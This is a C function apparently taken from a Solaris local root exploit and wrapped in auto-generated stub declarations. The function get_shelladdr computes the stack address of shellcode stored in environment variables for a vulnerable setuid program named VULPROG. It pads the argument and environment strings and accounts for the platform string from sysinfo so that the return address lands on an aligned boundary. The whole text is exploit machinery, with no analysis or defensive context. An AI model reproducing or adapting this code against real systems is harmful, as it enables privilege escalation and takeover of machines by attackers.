
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int SI_PLATFORM ;
 char* VULPROG ;
 int memset (char*,char,char) ;
 int strlen (char*) ;
 int sysinfo (int ,char*,int) ;

long
get_shelladdr(long sp_addr, char **arg, char **env, long off)
{
        long retaddr;
        int i;
        char plat[256];
        char pad = 0, pad1 = 0, pad2;
        int env_len, arg_len, len;

        while (1) {

                for (i = 0, arg_len = 0; arg[i] != ((void*)0); i++) {
                        arg_len += strlen(arg[i]) + 1;
                 }


                pad = 3 - arg_len % 4;

                memset(env[0], 'A', pad);
                env[0][pad] = '\0';

                memset(env[2], 'A', pad1);
                env[2][pad1] = '\0';


                for (i = 0, env_len = 0; env[i] != ((void*)0); i++) {
                        env_len += strlen(env[i]) + 1;
                 }


                sysinfo(SI_PLATFORM, plat, 256);

                len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1;

                pad2 = 4 - len % 4;


                retaddr = sp_addr - pad2
                        - strlen(VULPROG) - 1
                        - strlen(plat) - 1;

                for (i--; i > 0; i--)
                        retaddr -= strlen(env[i]) + 1;

                if (!((retaddr + off) & 0xff)) {
                        pad1 += 8;
                        continue;
                } else if ((retaddr + off) % 8) {
                        pad1 += 4;
                        continue;
                } else
                        break;
        }
        return retaddr;

}
